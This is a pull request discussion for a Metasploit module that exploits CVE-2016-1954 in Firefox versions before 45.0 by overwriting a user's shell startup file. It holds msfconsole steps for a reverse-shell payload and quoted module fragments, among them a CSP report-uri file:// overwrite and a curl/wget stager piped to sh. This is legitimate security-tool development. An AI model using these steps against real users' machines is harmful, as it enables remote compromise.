Add CVE-2016-1954, RCE on Firefox < 45.0
rapid7/metasploit-framework pull request #7400
Opened 2016-10-04 21:57 UTC by evo1

This module abuses an arbitrary write vuln on Firefox < 45.0 to get a shell on many common setups. You can fit ~50bytes inside of backticks in the overwritten file, so a `curl`/`wget` stager is used to get the full payload on to the client machine.

Let's get a shell on Ubuntu 14.0.4 by overwriting `/home/ubuntu/.bash_aliases`.

1. Run the msf module.

    ./msfconsole
    msf> use exploit/multi/browser/firefox_report_uri_file_overwrite
    msf> set payload linux/x64/shell_reverse_tcp
    msf> set SRVHOST <external-ip>
    msf> set LHOST <external-ip>
    msf> set FILES /home/ubuntu/.bash_aliases
    msf> run -j

2. In a fresh Ubuntu 14.0.4 VM (logged in as `ubuntu` user), open Firefox and browse to the exploit URL.

3. Still in Ubuntu 14.0.4, go and open a new Terminal.

4. 💰💰💰 Shells 💰💰💰

2016-10-04 23:12 UTC, egypt commented
Thanks for the module!  The bugzilla comments seem to suggest that it might be possible to use a `chrome://` url for guaranteed code exec without having to know the username; I wonder if there's a practical way to make that work.

2016-10-05 02:18 UTC, mach-0 commented
I investigated this a little bit but was discouraged. In 43+, add-ons must be signed. You still have to guess an installed add-on, and the add-on must be "unpacked". I attempted to write to other built-in chrome:// and resource:// URIs with no success (which makes sense as these all live bundled inside a `omni.ja` JAR file).

2016-10-20 16:32 UTC, bwatters-r7 commented
Module docs would be nice to add; see: https://github.com/rapid7/metasploit-framework/pull/7427 if you want to see an example.

2016-10-20 20:51 UTC, bwatters-r7 commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +      'Arch'           => [ARCH_CMD],
It looks like on a recent update, you switched from a group of architectures to ARCH_CMD, which limited the payload selection dramatically, and specifically, it prevents the selection you specified in your testing script (linux/x64/shell_reverse_tcp).

2016-11-14 20:47 UTC, bwatters-r7 commented
This needs some work to get it across the line.  I'd like to do it, but I can't for at least a few weeks, so I'm un-assigning myself.

2017-02-08 10:30 UTC, jvoisin approved these changes

2017-03-27 17:32 UTC, busterb requested changes
We found a lot of good stuff to fix. @bwatters-r7 would you like to take a look at this?

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +    ], self.class)
self.class is the assumed default, it is not needed here.

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +        'Path to the exploit. This needs to be "/" for space purposes.',
Do we need to override this? This parameter is already included in the mixin.

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +          'Content-Security-Policy' => "script-src 'self'; report-uri file://#{path}",
Maybe leave a comment here: "Here be the exploit" :)

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +        'Path to the exploit. This needs to be "/" for space purposes.',
What are the space restrictions here? Do these apply to this module, or did it come from somewhere else.

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +    frames = files.map { |f| "<iframe #{css} src='/?file=#{Rex::Text.uri_encode(f)}'></iframe>" }
This does not actually use URIPATH - is that on purpose? Should we just deregister URIPATH altogether?

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +    cmd = datastore['UseCurl'] ? 'curl' : 'wget -qO-'
if we are going to make wget quiet, we should make curl quiet too.

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +    cmd = datastore['UseCurl'] ? 'curl' : 'wget -qO-'
Suggestion from the experts: `(curl ...||wget...)|sh`
then there doesn't have to an option.

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +      echo '#{b64}' | base64 -d > #{payload_path}
this might not exist on targets. Though generally if you have Firefox intalled, you probably have base64. '-d' doesn't work on OS X unfortunately, needs '-D'

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +      #{files.map { |f| "rm -f #{f}" }.join("\n") }
this appears to delete the .login file - do we actually need the file dropper cleanup?

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +    register_file_for_cleanup(payload_path)
Since this module doesn't have a good idea if it is going to get executed, it's not a great idea to register the file for cleanup.

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +  def payload_path
without the filedropper cleanup, we can get rid of this, since we don't need to memoize state between methods.

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +require 'msf/core'
this require is not necessary

2017-03-27 17:32 UTC, busterb commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +        to plant a .bashrc (or similar) file on the victim, ultimately resulting in
this example file should probably match the default for FILES

2017-04-03 17:41 UTC, busterb commented
@wvu-r7 says, let's just convert this to an aux module, this removes a lot of complexity.

2017-05-18 06:03 UTC, evo1 commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +        '/home/ubuntu/.login'
No; this goes into a file:// URL. Tildes don't work.

2017-05-18 06:05 UTC, evo1 commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +        'Path to the exploit. This needs to be "/" for space purposes.',
I think if you add a path of > 2 chars, you go over the length limit on the error message that gets written to the file. So the backtick-shellscript invocation trails gets truncated.

2017-05-18 06:59 UTC, wvu-r7 commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +        'Path to the exploit. This needs to be "/" for space purposes.',
Thanks for the explanation. In case it isn't clear, most of these comments were left during a group review, so they may be a bit rhetorical in nature.

2017-05-19 02:49 UTC, evo1 commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +    cmd = datastore['UseCurl'] ? 'curl' : 'wget -qO-'
Again due to a space issue ^

2017-05-19 02:50 UTC, evo1 commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +      echo '#{b64}' | base64 -d > #{payload_path}
Good point. I think I will just `curl` a second stager.

2017-05-19 02:50 UTC, evo1 commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +      #{files.map { |f| "rm -f #{f}" }.join("\n") }
Hm, no, I will remove

2017-05-19 02:52 UTC, evo1 commented on modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb
> +      'Arch'           => [ARCH_CMD],
Oops. I tried ARCH_ALL but it fucked things up real bad. I'll go back to just listing tons of ARCHes

2017-05-19 03:23 UTC, closed without merging